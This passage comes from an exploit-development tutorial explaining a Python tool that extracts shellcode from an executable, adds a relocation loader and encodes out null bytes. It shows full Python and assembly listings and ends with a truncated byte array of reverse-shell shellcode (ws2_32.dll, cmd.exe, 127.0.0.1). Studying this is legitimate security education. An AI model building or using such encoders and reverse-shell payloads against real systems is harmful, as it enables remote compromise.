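The address arithmetic used in this section (file offset `56Ah`, virtual address `40116Ah`, and the string address `242118h` seen in the debugger) can be checked with a short sketch. Two values are assumptions rather than facts from the article: the raw file offset of `.text` (`400h`, chosen because it is consistent with the numbers above) and the actual load base `240000h`, which is inferred from the addresses in the disassembly.

```python
IMAGE_BASE = 0x400000   # preferred load address (from the map file)
TEXT_RVA = 0x1000       # .text starts at RVA 1000h (entryPoint is at 00401000)
TEXT_RAW = 0x400        # ASSUMPTION: file offset where .text begins
ACTUAL_BASE = 0x240000  # ASSUMPTION: inferred from the disassembly addresses

def file_offset_to_va(file_off, image_base=IMAGE_BASE):
    """Map a file offset inside .text to a virtual address."""
    return file_off - TEXT_RAW + TEXT_RVA + image_base

def rebase(va, actual_base, preferred_base=IMAGE_BASE):
    """What a base relocation does: shift a VA by the load-address delta."""
    return va - preferred_base + actual_base

push_va = file_offset_to_va(0x56A)             # the push instruction
string_va = rebase(0x402118, ACTUAL_BASE)      # pointer to "cmd.exe" after relocation

print(hex(push_va), hex(rebase(push_va, ACTUAL_BASE)), hex(string_va))
```

The relocation entry itself points one byte past the `push` opcode, which is why the article speaks of `40116Bh` rather than `40116Ah`.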

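Next, we analyze the relocations, find the addresses within our shellcode, and extract from `.rdata` the null-terminated strings referenced by those addresses.

As we already said, we are only interested in locations contained in our shellcode. Here is the relevant part of the function `get_shellcode_and_relocs`: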

```
        # Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element's rva is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str

        return (shellcode, relocs, addr_to_strings)

```

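`pe.DIRECTORY_ENTRY_BASERELOC` is a list of data structures, each of which has a field named `entries` holding a list of relocations. First we check whether the current relocation lies within the shellcode. If it does, we do the following:

1. we append to `relocs` the offset of the relocation relative to the start of the shellcode;

2. we extract from the shellcode the `DWORD` located at the offset just found and check that this `DWORD` points to data in `.rdata`;

3. we extract from `.rdata` the null-terminated string that starts at the location found in (2);

4. we add the string to `addr_to_strings`.

Note that:

i. `relocs` contains the offsets of the relocations within the shellcode, i.e. the offsets of the `DWORD`s within the shellcode that need to be fixed so that they point to the strings;

ii. `addr_to_strings` is a dictionary that maps the addresses found in (2) to the actual strings.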
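The four steps can be tried without a real PE file. The sketch below (Python 3) uses toy data: a two-instruction "shellcode", a fake `.rdata` buffer and a hand-written list of relocation RVAs. The section RVAs, the data, and this version of `get_cstring` are illustrative assumptions; the script's own `get_cstring` is not shown in this part of the article.

```python
import struct

IMAGE_BASE = 0x400000
SHELLCODE_START = 0x1000           # RVA of .text (toy value)
RDATA_START = 0x2000               # RVA of .rdata (toy value)

rdata = b"\0" * 0x118 + b"cmd.exe\0"                          # string at RVA 0x2118
shellcode = b"\x68" + struct.pack("<I", 0x402118) + b"\x52"   # push 402118h; push edx
reloc_rvas = [0x1001, 0x3000]      # the second entry lies outside the shellcode

def get_cstring(data, offset):
    """Hypothetical stand-in: return the string at offset, terminator included."""
    end = data.find(b"\0", offset)
    return None if end == -1 else data[offset:end + 1]

relocs = []
addr_to_strings = {}
for rva in reloc_rvas:
    if SHELLCODE_START <= rva < SHELLCODE_START + len(shellcode):
        off = rva - SHELLCODE_START                                  # step 1
        relocs.append(off)
        string_va = struct.unpack_from("<I", shellcode, off)[0]      # step 2
        string_rva = string_va - IMAGE_BASE
        assert RDATA_START <= string_rva < RDATA_START + len(rdata)
        s = get_cstring(rdata, string_rva - RDATA_START)             # step 3
        addr_to_strings[string_va] = s                               # step 4

print(relocs, addr_to_strings)
```

Only the relocation at RVA `1001h` is kept, because the other one falls outside the shellcode range.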

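#### Adding the loader to the shellcode

The idea is to append the strings contained in `addr_to_strings` to the end of our shellcode and then make our code reference those strings.

Unfortunately, the code→strings linking must be done at runtime because we don't know the starting address of the shellcode. To do this, we need to prepend a sort of "loader" which fixes the shellcode at runtime. Here is the structure of our shellcode after the transformation:

![enter image description here](http://drops.javaweb.org/uploads/images/0c6da1a59de94ba025faf085401802da91fc778a.jpg)

`offX` are `DWORD`s which point to the locations in the original shellcode that need to be fixed. The loader fixes these locations so that they point to the correct strings `strX`. To see exactly how this works, try to understand the following code: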

```
def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations

    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>       (contains offsets to strX (offsets are from "here" label))
    #   relocs:
    #       off1|off2|...     (offsets to relocations (offsets are from "here" label))
    #       str1|str2|...

    delta = 21                                      # shellcode_start - here

    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]

    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)

    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])

    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)

```

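Let's have a look at the loader:

```
    CALL here                   ; PUSH EIP+5; JMP here
  here:
    POP ESI                     ; ESI = address of "here"
    MOV EDI, ESI                ; EDI = address of "here"
    ADD ESI, shellcode_start + len(shellcode) - here        ; ESI = address of off1
    MOV ECX, len(relocs)        ; ECX = number of locations to fix
    CLD                         ; tells LODSD to go forwards
  again:
    LODSD                       ; EAX = offX; ESI += 4
    ADD [EDI+EAX], EDI          ; fixes location within shellcode
    LOOP again                  ; DEC ECX; if ECX > 0 then JMP again
  shellcode_start:
    <shellcode>
  relocs:
    off1|off2|...
    str1|str2|...

```

First, a `CALL` is used to get the absolute address of `here` in memory. The loader uses this information to fix the offsets in the original shellcode. `ESI` points to `off1`, so `LODSD` is used to read the offsets one by one. The instruction

```
ADD [EDI+EAX], EDI

```

fixes the locations within the shellcode. `EAX` is the current `offX`, which is the offset of the location relative to `here`. This means that `EDI+EAX` is the absolute address of that location. The `DWORD` at that location contains the offset of the correct string relative to `here`. By adding `EDI` to that `DWORD`, we turn it into the absolute address of the string. When the loader has finished, execution falls through into the shellcode, which is now fixed.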
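To see the fix-up loop in action, the following sketch (Python 3) lays out a tiny payload in the same order the loader expects and then emulates the `LODSD` / `ADD [EDI+EAX], EDI` loop on a `bytearray` that stands in for memory. It is a simplified model under stated assumptions: each relocation references its own string, addresses are just indices into the buffer, and `build_payload` and `run_loader` are hypothetical helper names.

```python
import struct

DELTA = 21   # shellcode_start - here, as in add_loader_to_shellcode

def build_payload(shellcode, relocs, strings):
    """Return shellcode | off1.. | str1.., with all offsets relative to 'here'.

    relocs[i] is the position inside shellcode of the pointer to strings[i].
    """
    sc = bytearray(shellcode)
    str_off = DELTA + len(sc) + 4 * len(relocs)
    for off, s in zip(relocs, strings):
        struct.pack_into("<I", sc, off, str_off)    # pointer -> offset from 'here'
        str_off += len(s)
    table = b"".join(struct.pack("<I", r + DELTA) for r in relocs)
    return bytes(sc) + table + b"".join(strings)

def run_loader(memory, here, shellcode_len, num_relocs):
    """Emulate: LODSD; ADD [EDI+EAX], EDI; LOOP again."""
    edi = here
    esi = here + DELTA + shellcode_len              # address of off1
    for _ in range(num_relocs):
        eax = struct.unpack_from("<I", memory, esi)[0]
        esi += 4
        value = struct.unpack_from("<I", memory, edi + eax)[0]
        struct.pack_into("<I", memory, edi + eax, (value + edi) & 0xFFFFFFFF)

HERE = 0x100                                        # arbitrary runtime address of 'here'
shellcode = b"\x68\x00\x00\x00\x00\x52"             # push <ptr>; push edx
payload = build_payload(shellcode, [1], [b"cmd.exe\0"])
memory = bytearray(HERE + DELTA) + payload          # the loader stub itself is left as zeros
run_loader(memory, HERE, len(shellcode), 1)

ptr = struct.unpack_from("<I", memory, HERE + DELTA + 1)[0]
print(hex(ptr), bytes(memory[ptr:ptr + 8]))
```

After the loop, the operand of the `push` holds an absolute address, and the bytes at that address are the string the shellcode expects.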

To conclude, `add_loader_to_shellcode` is called only if there are relocations. You can see that in the `main` function:

```

    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')

```

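#### Removing null bytes from the shellcode (I)

Two functions take care of removing the null bytes:

```
1.get_fixed_shellcode_single_block
2.get_fixed_shellcode

```

The first function does not always work but produces shorter code, so it should be tried first. The second function produces longer code, but it works even when every non-null byte value appears somewhere in the shellcode.

Let's start with `get_fixed_shellcode_single_block`. Here is the function definition: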

```
def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''

    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]

    (xor1, xor2) = get_xor_values(len(shellcode))

    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, xor1
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, xor2  (ECX = shellcode length)
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, missing_byte
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]

    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))

```

The idea is simple. We analyze the shellcode byte by byte and look for a missing value, i.e. a value that never appears in the shellcode. Say this value is `0x14`. If we replace every `0x00` in the shellcode with `0x14`, the shellcode no longer contains null bytes, but it cannot run because it has been modified. The last step is to prepend a decoder which, at runtime, restores the null bytes before the original shellcode is executed. Here it is:

```
  CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = "here"
  MOV ECX, xor1
  XOR ECX, xor2                               ; ECX = shellcode length
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of original shellcode
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop1:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of the shellcode
  CMP AL, missing_byte                        ; is AL the special byte?
  CMOVE EAX, ESI                              ; if AL is the special byte, then EAX = 0
  STOSB                                       ; overwrite the current byte of the shellcode with AL
  LOOP loop1                                  ; DEC ECX; if ECX > 0 then JMP loop1
shellcode_begin:

```
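The encode/decode round trip can be modelled in a few lines of Python 3. This is only a sketch of the idea: `encode` mirrors what the script does when it builds the payload, and `decode` mirrors what the assembly stub does at runtime. Both function names and the sample bytes are illustrative.

```python
def encode(shellcode):
    """Replace every 0x00 with a byte value that never occurs in shellcode.

    Returns (missing_byte, encoded), or None if all 255 non-null values occur.
    """
    present = set(shellcode)
    missing = [b for b in range(1, 256) if b not in present]
    if not missing:
        return None
    m = missing[0]
    return m, shellcode.replace(b"\0", bytes([m]))

def decode(missing_byte, encoded):
    """Runtime counterpart: every occurrence of missing_byte becomes 0x00 again."""
    return bytes(0 if b == missing_byte else b for b in encoded)

original = b"\x68\x18\x21\x40\x00\x52\x01\x02"   # sample bytes containing one null
missing_byte, encoded = encode(original)

print(hex(missing_byte), encoded.hex(), decode(missing_byte, encoded) == original)
```

The round trip is lossless precisely because the chosen value never occurs in the original bytes, so every occurrence in the encoded form must have been a null byte.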

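There are a couple of important details to discuss here. First of all, this code cannot contain null bytes itself, because then we would need yet another piece of code to remove them.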

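As you can see, the `CALL` instruction does not jump to `here`, because otherwise its opcode would have been

```
E8 00 00 00 00 # CALL here

```

which contains four null bytes. Since the `CALL` instruction is 5 bytes long, `CALL here` is equivalent to `CALL $+5`. The trick to get rid of the null bytes is to use `CALL $+4`:

```
E8 FF FF FF FF # CALL $+4

```

This `CALL` skips 4 bytes and jumps to the last `FF` of the `CALL` itself. The `CALL` is followed by the byte `C0`, so the instruction executed after the `CALL` is `INC EAX`, which corresponds to the opcode `FF C0`. Note that the value pushed by the `CALL` is still the absolute address of the `here` label.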
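The overlap between the `CALL` and the following instruction is easy to verify numerically. The sketch below (Python 3) decodes the relative displacement of an `E8` call and shows where execution lands and which address is pushed. The helper `call_rel32` is a hypothetical name used for illustration.

```python
import struct

def call_rel32(addr, code):
    """Return (target, return_address) for an E8 rel32 CALL located at addr."""
    assert code[0] == 0xE8
    rel = struct.unpack_from("<i", code, 1)[0]   # signed 32-bit displacement
    ret = addr + 5                               # address of the next instruction ("here")
    return ret + rel, ret

# CALL $+4, followed by C0 and then 5F (POP EDI), placed at address 0.
stub = bytes([0xE8, 0xFF, 0xFF, 0xFF, 0xFF, 0xC0, 0x5F])
target, ret = call_rel32(0, stub)

# The plain "CALL here" form, for comparison.
plain_target, plain_ret = call_rel32(0, bytes([0xE8, 0, 0, 0, 0]))

print(target, ret, stub[target:target + 2].hex())
```

Execution resumes at offset 4, where the bytes `FF C0` decode as `INC EAX`, while the pushed return address is still offset 5.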

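Here is the second trick used to avoid null bytes: the pair of instructions `MOV ECX, xor1` and `XOR ECX, xor2`.

We could have just used `MOV ECX, len(shellcode)`, but that would produce null bytes. In fact, for a shellcode of length `0x400`, we would get the instruction `B9 00 04 00 00` (`MOV ECX, 400h`), which contains 3 null bytes.

To avoid this problem, we choose a non-null byte that does not appear in `00000400h`. Let's say we choose `0x01`. Now we compute:

```
xor1 = 00000400h xor 01010101h = 01010501h
xor2 = 01010101h

```

Neither `xor1` nor `xor2` contains null bytes, so the opcodes of the two instructions are free of null bytes, and the `XOR` yields the original value `400h`.

The two instructions are:

```
B9 01 05 01 01 MOV ECX, 01010501h
81 F1 01 01 01 01 XOR ECX, 01010101h

```

The xor values are computed by the function `get_xor_values`.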
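As a quick check of the numbers above, here is a Python 3 rendering of the same computation. It is a sketch that follows the logic of the script's `get_xor_values`, but it works on `bytes` objects rather than on the lists returned by the script's helper functions.

```python
import struct

def get_xor_values(value):
    """Find xor1, xor2 (4 little-endian bytes each) with xor1 ^ xor2 == value
    and no null byte in either of them."""
    data = struct.pack("<I", value)
    # A non-null byte value that does not occur in the DWORD itself.
    missing = next(b for b in range(1, 256) if b not in data)
    xor1 = bytes(b ^ missing for b in data)     # b ^ missing == 0 only if b == missing
    xor2 = bytes([missing]) * 4
    return xor1, xor2

xor1, xor2 = get_xor_values(0x400)
v1 = struct.unpack("<I", xor1)[0]
v2 = struct.unpack("<I", xor2)[0]

print("%08Xh xor %08Xh = %Xh" % (v1, v2, v1 ^ v2))
```

Because the chosen byte does not occur in the original value, no byte of `xor1` can be zero, which is what makes the trick work for any length.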

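As mentioned above, the rest of the code is easy to understand: it walks through the shellcode byte by byte and overwrites with a null byte every byte that holds the special value (`0x14` in our earlier example).

#### Removing null bytes from the shellcode (II)

The method above fails when no byte value is absent from the shellcode. In that case we need `get_fixed_shellcode`, which is a little more complex.

The idea is to divide the shellcode into blocks of `254` bytes. Every block must have a "missing byte", because a byte can take `255` non-zero values but a block holds only `254` bytes. We could choose a missing byte for each block and handle each block individually, but that would not be very space-efficient: for a shellcode of `254*N` bytes we would need to store N missing bytes before or after the shellcode (the decoder needs to know them). A better approach is to use the same missing byte for as many 254-byte blocks as possible. We start from the beginning of the shellcode and keep adding blocks to the current chunk as long as some byte value is missing from all of them. When adding a block would leave no missing byte, that block starts a new chunk. In the end, we have a list of `<missing_byte, num_blocks>` pairs:

```
[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...]

```

I decided to restrict `num_blocksX` to a single byte, so `num_blocksX` is between 1 and 255.

Here is the part of `get_fixed_shellcode` that splits the shellcode into chunks: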

```
def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''

    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))

        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                # The pair goes into bytes_blocks ("bytes" is only the set of
                # values found in the current block).
                bytes_blocks += [missing_bytes[0], num_blocks]
                break

```
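The chunking strategy can be exercised on its own. The sketch below (Python 3) follows the same greedy logic but returns the pairs as tuples instead of a flat list; `split_into_chunks` is a hypothetical name, and the two inputs are artificial test data rather than real shellcode.

```python
def split_into_chunks(shellcode, block_size=254):
    """Greedily group consecutive 254-byte blocks that share a missing byte.

    Returns a list of (missing_byte, num_blocks) pairs.
    """
    pairs = []
    i = 0
    while i < len(shellcode):
        num_blocks = 0
        missing = list(range(1, 256))
        while i < len(shellcode) and num_blocks < 255:
            block = set(shellcode[i:i + block_size])
            still_missing = [b for b in missing if b not in block]
            if not still_missing:
                break                   # this block must start a new chunk
            missing = still_missing
            num_blocks += 1
            i += block_size
        pairs.append((missing[0], num_blocks))
    return pairs

# Every byte value occurs, so a single missing byte cannot cover the whole input.
hard = bytes(range(256)) * 2
# Only two distinct values occur, so one chunk covers all three blocks.
easy = b"\x00\x01" * 300

print(split_into_chunks(hard))
print(split_into_chunks(easy))
```

A chunk always contains at least one block, because a single 254-byte block cannot use up all 255 non-null values.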

As before, we need to discuss the decoder that is prepended to the shellcode. This decoder is a bit longer than the previous one, but the principle is the same.

Here is the code:

```
code = ([
    0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                        # bytes:
    bytes_blocks + [                                    #   ...
                                                        # skip_bytes:
    0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                        # here:
    0xC0,                                               #   (FF)C0 = INC EAX
    0x5F,                                               #   POP EDI
    0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, xor1
    0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, xor2  (ECX = shellcode length)
    0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
    0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                        # loop1:
    0xB0, 0xFE,                                         #   MOV AL, 0FEh
    0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
    0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
    0x33, 0xF6,                                         #   XOR ESI, ESI
    0xFC,                                               #   CLD
                                                        # loop2:
    0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
    0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
    0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
    0xAA,                                               #   STOSB
    0x49,                                               #   DEC ECX
    0x74, 0x07,                                         #   JE shellcode_begin
    0x4A,                                               #   DEC EDX
    0x75, 0xF2,                                         #   JNE loop2
    0x43,                                               #   INC EBX
    0x43,                                               #   INC EBX
    0xEB, 0xE3                                          #   JMP loop1
                                                        # shellcode_begin:
])

```

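`bytes_blocks` is the array:

```
[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...]

```

that we discussed before, but flattened rather than stored as pairs.

Note that the code starts with a `JMP SHORT` that skips `bytes_blocks`. For this to work, `len(bytes_blocks)` must be less than or equal to `0x7F`. But as you can see, `len(bytes_blocks)` also appears in another instruction:

```
0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF, # LEA EBX, [EDI + (bytes - here)]

```

This requires `len(bytes_blocks)` to be less than or equal to `0x7F - 5`, so this is the binding condition. Here is what happens when the condition is violated:

```
    if len(bytes_blocks) > 0x7f - 5:
        # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
        return None

```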
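The size limit comes from the fact that both instructions encode their operand as a signed 8-bit value. The sketch below (Python 3) computes the displacement byte used by the `LEA` and rejects values that no longer fit. The function name `lea_disp8` is hypothetical, and the range check shown is the generic signed-byte range, which is slightly looser than the script's own `0x7f - 5` test.

```python
def lea_disp8(num_table_bytes):
    """Encode (bytes - here) as the disp8 of LEA EBX, [EDI + disp8].

    The table of num_table_bytes bytes and the 5-byte CALL both sit
    between the 'bytes' label and the 'here' label.
    """
    disp = -(num_table_bytes + 5)
    if not -128 <= disp <= 127:
        raise ValueError("displacement does not fit in a signed byte")
    return disp & 0xFF

def signed8(byte):
    """Interpret an encoded byte as a signed 8-bit value."""
    return byte - 256 if byte >= 0x80 else byte

two_pairs = lea_disp8(4)            # two (missing_byte, num_blocks) pairs
at_limit = lea_disp8(0x7F - 5)      # largest table the script accepts

print(hex(two_pairs), signed8(two_pairs), hex(at_limit), signed8(at_limit))
```

With the script's limit of `0x7F - 5` table bytes, the displacement is -127, which still fits in a signed byte.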

Let's review the code in more detail:

```
JMP SHORT skip_bytes
bytes:
  ...
skip_bytes:
  CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = absolute address of "here"
  MOV ECX, <null-free value 1>
  XOR ECX, <null-free value 2>                ; ECX = value 1 xor value 2 = shellcode length
  LEA EBX, [EDI + (bytes - here)]             ; EBX = absolute address of "bytes"
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of the shellcode
loop1:
  MOV AL, 0FEh                                ; AL = 254
  MUL BYTE PTR [EBX+1]                        ; AX = 254 * current num_blocksX = num bytes
  MOVZX EDX, AX                               ; EDX = num bytes of the current chunk
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop2:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of shellcode
  CMP AL, BYTE PTR [EBX]                      ; is AL the missing byte for the current chunk?
  CMOVE EAX, ESI                              ; if it is, then EAX = 0
  STOSB                                       ; replaces the current byte of the shellcode with AL
  DEC ECX                                     ; ECX -= 1
  JE shellcode_begin                          ; if ECX == 0, then we're done!
  DEC EDX                                     ; EDX -= 1
  JNE loop2                                   ; if EDX != 0, then we keep working on the current chunk
  INC EBX                                     ; EBX += 1  (moves to next pair...
  INC EBX                                     ; EBX += 1   ... missing_bytes, num_blocks)
  JMP loop1                                   ; starts working on the next chunk
shellcode_begin:
```
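The two nested loops can be mirrored in Python to check the logic without running any machine code. This is only a sketch under the assumptions stated in the comments: the function name `decode` and the sample data are hypothetical, and the variables merely play the roles of the registers in the listing.

```python
def decode(encoded, bytes_blocks):
    """Emulate loop1/loop2: restore the null bytes of an encoded shellcode."""
    data = bytearray(encoded)
    remaining = len(data)   # plays the role of ECX
    pos = 0                 # plays the role of EDI
    pair = 0                # plays the role of EBX (index into bytes_blocks)
    while remaining:
        missing_byte = bytes_blocks[pair]
        chunk_len = 254 * bytes_blocks[pair + 1]    # MUL result, kept in EDX
        while chunk_len and remaining:
            if data[pos] == missing_byte:           # CMP + CMOVE
                data[pos] = 0                       # STOSB stores 0 instead
            pos += 1
            remaining -= 1
            chunk_len -= 1
        pair += 2                                   # INC EBX, twice
    return bytes(data)


# Hypothetical data: one full 254-byte block whose missing byte is 0x05,
# followed by 3 bytes belonging to a block whose missing byte is 0x07.
encoded = bytes([0x05, 0x90] * 127) + bytes([0x07, 0x05, 0xC3])
decoded = decode(encoded, [0x05, 1, 0x07, 1])
print(decoded[:2].hex(), decoded[-3:].hex())
```

Note that the `0x05` in the last three bytes is left alone, because in that chunk only `0x07` stands for a null byte.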

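### Testing the script

This is the easy part! If you run the script without any arguments, it prints:

```
Shellcode Extractor by Massimiliano Tomassoli (2015)

Usage:
  sce.py <exe file> <map file>
```

If you remember, we also told the `linker` of `VS 2013` to produce a map file. Just call the script with the path to the `exe` file and the path to the map file. Here is what we get for our reverse `shellcode`: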

```
Shellcode Extractor by Massimiliano Tomassoli (2015)

Extracting shellcode length from "mapfile"...
shellcode length: 614
Extracting shellcode from "shellcode.exe" and analyzing relocations...
Found 3 reference(s) to 3 string(s) in .rdata
Strings:
ws2_32.dll
cmd.exe
127.0.0.1

Fixing the shellcode...
final shellcode length: 715

char shellcode[] =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
"\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
"\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
"\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
"\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
"\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
"\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
"\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
"\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
"\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
"\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
"\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
"\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
"\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
"\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
"\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
"\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
"\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
"\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
"\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
"\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
"\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
"\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
"\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
"\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
"\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
"\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
